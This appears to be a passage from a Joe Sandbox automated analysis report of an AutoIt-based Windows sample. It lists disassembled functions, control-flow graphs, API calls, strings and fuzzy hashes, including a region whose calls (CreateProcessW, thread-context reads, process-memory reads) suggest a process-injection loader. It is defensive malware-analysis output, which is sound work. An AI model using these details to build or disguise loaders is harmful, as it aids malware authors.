                                                      • CreatePopupMenu.USER32 ref: 00A6373E
                                                      • PostQuitMessage.USER32(00000000), ref: 00A6375F
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                      • String ID: TaskbarCreated
                                                      • API String ID: 129472671-2362178303
                                                      • Opcode ID: db14a5ed133c16f5a433f29240ab2d8cab517efd350fa949e0fcc1c1e5734dc0
                                                      • Instruction ID: 5344276f236adfb3bfe867b3c25230c8c54feee811312db2e455a42b74e8ae8d
                                                      • Opcode Fuzzy Hash: db14a5ed133c16f5a433f29240ab2d8cab517efd350fa949e0fcc1c1e5734dc0
                                                      • Instruction Fuzzy Hash: 0F4138B3204185BBDF24DF68ED49B7A37B5EB14300F140129F6029B2A1DF749E439761
                                                      Function 00A63778 Relevance: 14.3, APIs: 1, Strings: 7, Instructions: 267COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: FileLibraryLoadModuleName__wcsicmp_l_memmove
                                                      • String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$>>>AUTOIT NO CMDEXECUTE<<<$CMDLINE$CMDLINERAW
                                                      • API String ID: 1825951767-3513169116
                                                      • Opcode ID: 8187f19d57b256ac77d5998d84da75c00c8d0baae3b382c5f30b1d4095908a99
                                                      • Instruction ID: e64ba2713faea2bbc8534341ca98a79b726af5ed184d520b3252d22e1349edd0
                                                      • Opcode Fuzzy Hash: 8187f19d57b256ac77d5998d84da75c00c8d0baae3b382c5f30b1d4095908a99
                                                      • Instruction Fuzzy Hash: 6AA14F72910229AACF14EBA0CD95EEEB7B8FF14700F14052AF416B7191DF759A0ACB60
                                                      Function 03D82620 Relevance: 10.7, APIs: 7, Instructions: 239fileCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 942 3d82620-3d826ce call 3d80000 945 3d826d5-3d826fb call 3d83530 CreateFileW 942->945 948 3d826fd 945->948 949 3d82702-3d82712 945->949 950 3d8284d-3d82851 948->950 956 3d82719-3d82733 VirtualAlloc 949->956 957 3d82714 949->957 951 3d82893-3d82896 950->951 952 3d82853-3d82857 950->952 958 3d82899-3d828a0 951->958 954 3d82859-3d8285c 952->954 955 3d82863-3d82867 952->955 954->955 959 3d82869-3d82873 955->959 960 3d82877-3d8287b 955->960 961 3d8273a-3d82751 ReadFile 956->961 962 3d82735 956->962 957->950 963 3d828a2-3d828ad 958->963 964 3d828f5-3d8290a 958->964 959->960 967 3d8288b 960->967 968 3d8287d-3d82887 960->968 969 3d82758-3d82798 VirtualAlloc 961->969 970 3d82753 961->970 962->950 971 3d828af 963->971 972 3d828b1-3d828bd 963->972 965 3d8291a-3d82922 964->965 966 3d8290c-3d82917 VirtualFree 964->966 966->965 967->951 968->967 975 3d8279a 969->975 976 3d8279f-3d827ba call 3d83780 969->976 970->950 971->964 973 3d828bf-3d828cf 972->973 974 3d828d1-3d828dd 972->974 977 3d828f3 973->977 978 3d828ea-3d828f0 974->978 979 3d828df-3d828e8 974->979 975->950 982 3d827c5-3d827cf 976->982 977->958 978->977 979->977 983 3d827d1-3d82800 call 3d83780 982->983 984 3d82802-3d82816 call 3d83590 982->984 983->982 990 3d82818 984->990 991 3d8281a-3d8281e 984->991 990->950 992 3d8282a-3d8282e 991->992 993 3d82820-3d82824 FindCloseChangeNotification 991->993 994 3d8283e-3d82847 992->994 995 3d82830-3d8283b VirtualFree 992->995 993->992 994->945 994->950 995->994
                                                      APIs
                                                      • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 03D826F1
                                                      • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 03D82917
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1399187842.0000000003D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D80000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_3d80000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: CreateFileFreeVirtual
                                                      • String ID:
                                                      • API String ID: 204039940-0
                                                      • Opcode ID: c69e8af538ca099f1199ea1a41374fe769c00d7324591793f5319154b009097c
                                                      • Instruction ID: f86c16a0db831eced69bd11a5a93d0d51a61d0d596ded6e49bdc960051e37837
                                                      • Opcode Fuzzy Hash: c69e8af538ca099f1199ea1a41374fe769c00d7324591793f5319154b009097c
                                                      • Instruction Fuzzy Hash: 8BA10774E00209EBDF14DFA4C894BAEBBB5FF48704F248999E505BB280D775AA41CF54
                                                      Function 00A639E7 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 1073 a639e7-a63a57 CreateWindowExW * 2 ShowWindow * 2
                                                      APIs
                                                      • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00A63A15
                                                      • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00A63A36
                                                      • ShowWindow.USER32(00000000,?,?), ref: 00A63A4A
                                                      • ShowWindow.USER32(00000000,?,?), ref: 00A63A53
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: Window$CreateShow
                                                      • String ID: AutoIt v3$edit
                                                      • API String ID: 1584632944-3779509399
                                                      • Opcode ID: d96e73a1a4edbef729d69ad993fc76d496e46530b22faaf61b57b943fa8963d4
                                                      • Instruction ID: b9451fcd8ffd34f9eacd9aac6ab2d4f8fe6e6f255dfdb878affa7c834f941c52
                                                      • Opcode Fuzzy Hash: d96e73a1a4edbef729d69ad993fc76d496e46530b22faaf61b57b943fa8963d4
                                                      • Instruction Fuzzy Hash: 0CF0B771641290FEEA3157676C49E773F7DE7C6F50B01412AB904E7160CAB51852DAB0
                                                      Function 03D82410 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 135fileCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 1074 3d82410-3d82514 call 3d80000 call 3d82300 CreateFileW 1081 3d8251b-3d8252b 1074->1081 1082 3d82516 1074->1082 1085 3d8252d 1081->1085 1086 3d82532-3d8254c VirtualAlloc 1081->1086 1083 3d825cb-3d825d0 1082->1083 1085->1083 1087 3d8254e 1086->1087 1088 3d82550-3d82567 ReadFile 1086->1088 1087->1083 1089 3d82569 1088->1089 1090 3d8256b-3d825a5 call 3d82340 call 3d81300 1088->1090 1089->1083 1095 3d825c1-3d825c9 ExitProcess 1090->1095 1096 3d825a7-3d825bc call 3d82390 1090->1096 1095->1083 1096->1095
                                                      APIs
                                                        • Part of subcall function 03D82300: Sleep.KERNELBASE(000001F4), ref: 03D82311
                                                      • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 03D8250A
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1399187842.0000000003D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D80000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_3d80000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: CreateFileSleep
                                                      • String ID: PQ9EOIJH7CD3J
                                                      • API String ID: 2694422964-827068972
                                                      • Opcode ID: 0c7f9290556646d91bf9e677257f0cab2358981354ac30b8a5e06a1a8c088c88
                                                      • Instruction ID: 1d56f2fb009c25b85993435eeadbac57e1589f0426b3283ec8de63d77f1512d1
                                                      • Opcode Fuzzy Hash: 0c7f9290556646d91bf9e677257f0cab2358981354ac30b8a5e06a1a8c088c88
                                                      • Instruction Fuzzy Hash: 62517171D44249EAEF10EBE4C818BEFBBB8AF44700F004599E609BB2C0D7795B45CBA5
                                                      Function 00A6410D Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 88windowCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 1098 a6410d-a64123 1099 a64200-a64204 1098->1099 1100 a64129-a6413e call a67b76 1098->1100 1103 a64144-a64164 call a67d2c 1100->1103 1104 a9d5dd-a9d5ec LoadStringW 1100->1104 1107 a9d5f7-a9d60f call a67c8e call a67143 1103->1107 1108 a6416a-a6416e 1103->1108 1104->1107 1117 a6417e-a641fb call a83020 call a6463e call a82ffc Shell_NotifyIconW call a65a64 1107->1117 1120 a9d615-a9d633 call a67e0b call a67143 call a67e0b 1107->1120 1110 a64174-a64179 call a67c8e 1108->1110 1111 a64205-a6420e call a681a7 1108->1111 1110->1117 1111->1117 1117->1099 1120->1117
                                                      APIs
                                                      • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 00A9D5EC
                                                        • Part of subcall function 00A67D2C: _memmove.LIBCMT ref: 00A67D66
                                                      • _memset.LIBCMT ref: 00A6418D
                                                      • _wcscpy.LIBCMT ref: 00A641E1
                                                      • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00A641F1
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: IconLoadNotifyShell_String_memmove_memset_wcscpy
                                                      • String ID: Line:
                                                      • API String ID: 3942752672-1585850449
                                                      • Opcode ID: bc4a9c8872eb1b5a0435be1db704f5308d0d0a764984fb70bc70b2b7d52feb70
                                                      • Instruction ID: cb19a1ac89d6524cabfe95ed1aebeb3b82c8563cb40c452fdd568bf24f78d616
                                                      • Opcode Fuzzy Hash: bc4a9c8872eb1b5a0435be1db704f5308d0d0a764984fb70bc70b2b7d52feb70
                                                      • Instruction Fuzzy Hash: C331BF71408354AAD732EB60DD46FEF77F8AF49304F104A1AF195930A1EF74AA49CB92
                                                      Function 00A8564D Relevance: 7.7, APIs: 5, Instructions: 163COMMONLIBRARYCODE
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 1133 a8564d-a85666 1134 a85668-a8566d 1133->1134 1135 a85683 1133->1135 1134->1135 1136 a8566f-a85671 1134->1136 1137 a85685-a8568b 1135->1137 1138 a8568c-a85691 1136->1138 1139 a85673-a85678 call a88d68 1136->1139 1141 a8569f-a856a3 1138->1141 1142 a85693-a8569d 1138->1142 1151 a8567e call a88ff6 1139->1151 1143 a856b3-a856b5 1141->1143 1144 a856a5-a856b0 call a83020 1141->1144 1142->1141 1146 a856c3-a856d2 1142->1146 1143->1139 1148 a856b7-a856c1 1143->1148 1144->1143 1149 a856d9 1146->1149 1150 a856d4-a856d7 1146->1150 1148->1139 1148->1146 1153 a856de-a856e3 1149->1153 1150->1153 1151->1135 1155 a856e9-a856f0 1153->1155 1156 a857cc-a857cf 1153->1156 1157 a85731-a85733 1155->1157 1158 a856f2-a856fa 1155->1158 1156->1137 1159 a8579d-a8579e call a90df7 1157->1159 1160 a85735-a85737 1157->1160 1158->1157 1161 a856fc 1158->1161 1168 a857a3-a857a7 1159->1168 1163 a85739-a85741 1160->1163 1164 a8575b-a85766 1160->1164 1165 a857fa 1161->1165 1166 a85702-a85704 1161->1166 1169 a85751-a85755 1163->1169 1170 a85743-a8574f 1163->1170 1171 a85768 1164->1171 1172 a8576a-a8576d 1164->1172 1167 a857fe-a85807 1165->1167 1173 a8570b-a85710 1166->1173 1174 a85706-a85708 1166->1174 1167->1137 1168->1167 1175 a857a9-a857ae 1168->1175 1176 a85757-a85759 1169->1176 1170->1176 1171->1172 1177 a8576f-a8577b call a84916 call a910ab 1172->1177 1178 a857d4-a857d8 1172->1178 1173->1178 1179 a85716-a8572f call a90f18 1173->1179 1174->1173 1175->1178 1181 a857b0-a857c1 1175->1181 1176->1172 1194 a85780-a85785 1177->1194 1182 a857ea-a857f5 call a88d68 1178->1182 1183 a857da-a857e7 call a83020 1178->1183 1191 a85792-a8579b 1179->1191 1186 a857c4-a857c6 1181->1186 1182->1151 1183->1182 1186->1155 1186->1156 1191->1186 1195 a8578b-a8578e 1194->1195 1196 a8580c-a85810 1194->1196 1195->1165 1197 a85790 1195->1197 1196->1167 1197->1191
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
                                                      • String ID:
                                                      • API String ID: 1559183368-0
                                                      • Opcode ID: cbc132a2d90f1fa170c901e77712e707e3c45fd9b9f6dd10e42efcbbdaed9f46
                                                      • Instruction ID: ba9bd34f2afb8e15b99f185c96669866f275a8613c08693e028b72a31a8ba0cf
                                                      • Opcode Fuzzy Hash: cbc132a2d90f1fa170c901e77712e707e3c45fd9b9f6dd10e42efcbbdaed9f46
                                                      • Instruction Fuzzy Hash: AE518234E00B05DFDB24AFB9C98466E7BB6AF40320F68CB29FC25962D0E7759D509B50
                                                      Function 00A669CA Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 260COMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00A64F3D: LoadLibraryExW.KERNELBASE(?,00000000,00000002,?,00B262F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00A64F6F
                                                      • _free.LIBCMT ref: 00A9E68C
                                                      • _free.LIBCMT ref: 00A9E6D3
                                                        • Part of subcall function 00A66BEC: SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00A66D0D
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: _free$CurrentDirectoryLibraryLoad
                                                      • String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
                                                      • API String ID: 2861923089-1757145024
                                                      • Opcode ID: e6655fd045b813986d3e9daf80fd750b18286854d4b17a854a32b7e4e3d954c0
                                                      • Instruction ID: 7c5e944cc4bd0f3a1829fa6c0f204157765c41f885e965eda53e0dac0367bde8
                                                      • Opcode Fuzzy Hash: e6655fd045b813986d3e9daf80fd750b18286854d4b17a854a32b7e4e3d954c0
                                                      • Instruction Fuzzy Hash: 99914C71A10219EFCF04EFA4CD919EDB7B4FF19314F14446AF816AB2A2EB31A945CB50
                                                      Function 00A635B0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 59registryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,00A635A1,SwapMouseButtons,00000004,?), ref: 00A635D4
                                                      • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,00A635A1,SwapMouseButtons,00000004,?,?,?,?,00A62754), ref: 00A635F5
                                                      • RegCloseKey.KERNELBASE(00000000,?,?,00A635A1,SwapMouseButtons,00000004,?,?,?,?,00A62754), ref: 00A63617
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: CloseOpenQueryValue
                                                      • String ID: Control Panel\Mouse
                                                      • API String ID: 3677997916-824357125
                                                      • Opcode ID: e6c7c34067526e360a187870d034a854afb2e61eb0fcfc524b485283589438fc
                                                      • Instruction ID: f49d6c3b762e1d947d8666f0ff9b4cc26c68135e2eb745866f52c44d68540ec1
                                                      • Opcode Fuzzy Hash: e6c7c34067526e360a187870d034a854afb2e61eb0fcfc524b485283589438fc
                                                      • Instruction Fuzzy Hash: A711487A510218BFDF20CFA8DC809AFB7B8EF04740F008469E805DB210E2719F429760
                                                      Function 03D81300 Relevance: 6.7, APIs: 4, Instructions: 720processthreadCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • CreateProcessW.KERNELBASE(?,00000000), ref: 03D81ABB
                                                      • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 03D81B51
                                                      • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 03D81B73
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1399187842.0000000003D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D80000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_3d80000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                      • String ID:
                                                      • API String ID: 2438371351-0
                                                      • Opcode ID: 4a62210935fbc19ac52c28b7856ac9112c9a9e608a38d15f0a7da1a89c903d0f
                                                      • Instruction ID: 27b2090232afb4fb3a97f67b2c989c620a1b376c7870b4d76c3c32db55c14a39
                                                      • Opcode Fuzzy Hash: 4a62210935fbc19ac52c28b7856ac9112c9a9e608a38d15f0a7da1a89c903d0f
                                                      • Instruction Fuzzy Hash: F4621B34A14258DBEB24DFA4C840BDEB376EF58700F1091A9D10DEB390E775AE85CB59
                                                      Function 00AC97E5 Relevance: 6.2, APIs: 4, Instructions: 155COMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00A65045: _fseek.LIBCMT ref: 00A6505D
                                                        • Part of subcall function 00AC99BE: _wcscmp.LIBCMT ref: 00AC9AAE
                                                        • Part of subcall function 00AC99BE: _wcscmp.LIBCMT ref: 00AC9AC1
                                                      • _free.LIBCMT ref: 00AC992C
                                                      • _free.LIBCMT ref: 00AC9933
                                                      • _free.LIBCMT ref: 00AC999E
                                                        • Part of subcall function 00A82F95: RtlFreeHeap.NTDLL(00000000,00000000,?,00A89C64), ref: 00A82FA9
                                                        • Part of subcall function 00A82F95: GetLastError.KERNEL32(00000000,?,00A89C64), ref: 00A82FBB
                                                      • _free.LIBCMT ref: 00AC99A6
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
                                                      • String ID:
                                                      • API String ID: 1552873950-0
                                                      • Opcode ID: c040f5d591410a8d3afab51092a26b6f5939c84b98243336257d617f1f09bfd3
                                                      • Instruction ID: 7567be754315b2bf70ebff5963c33d5d56679c2a9dade926d86cf524f3fa8df0
                                                      • Opcode Fuzzy Hash: c040f5d591410a8d3afab51092a26b6f5939c84b98243336257d617f1f09bfd3
                                                      • Instruction Fuzzy Hash: C8514AB1D04218AFDF249F64CC85BAEBBB9EF48310F1104AEB609A7251DB715E90CF58
                                                      Function 00A8493A Relevance: 6.1, APIs: 4, Instructions: 136COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                                                      • String ID:
                                                      • API String ID: 2782032738-0
                                                      • Opcode ID: 6b900c82ae833c016f0ad4fafe5841f230cacf6ecaddb2f96621bb99e00bcb06
                                                      • Instruction ID: f104f3bdc68bbe3c97436f6cdba8ce4abacfa28ebfe3bf809d1fd98734b119f6
                                                      • Opcode Fuzzy Hash: 6b900c82ae833c016f0ad4fafe5841f230cacf6ecaddb2f96621bb99e00bcb06
                                                      • Instruction Fuzzy Hash: 8E41B6716407079BDF2CEF69C88096FB7B9EF883A0B24817DE855DB640DB719D408744
                                                      Function 00A673E5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • _memset.LIBCMT ref: 00A9EE62
                                                      • GetOpenFileNameW.COMDLG32(?), ref: 00A9EEAC
                                                        • Part of subcall function 00A648AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00A648A1,?,?,00A637C0,?), ref: 00A648CE
                                                        • Part of subcall function 00A809D5: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00A809F4
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: Name$Path$FileFullLongOpen_memset
                                                      • String ID: X
                                                      • API String ID: 3777226403-3081909835
                                                      • Opcode ID: 251150a0aa2f4fd4e30503f0b3b848a0bf2ce2e7248c30f47cfc1a2c6a70f68b
                                                      • Instruction ID: 943e6f4c801baf402f9017eb027b57fee6b2ef644beb913707649ba692171080
                                                      • Opcode Fuzzy Hash: 251150a0aa2f4fd4e30503f0b3b848a0bf2ce2e7248c30f47cfc1a2c6a70f68b
                                                      • Instruction Fuzzy Hash: 9621D531A10298ABCF11DF94C845BEE7BF89F49314F00405AE408E7241DFB45A8A8FA1
                                                      Function 00AC901B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 51COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: __fread_nolock_memmove
                                                      • String ID: EA06
                                                      • API String ID: 1988441806-3962188686
                                                      • Opcode ID: 7a345965404b392e85f4b60d4760ffd122435acde8366f0ba82977351ddd2056
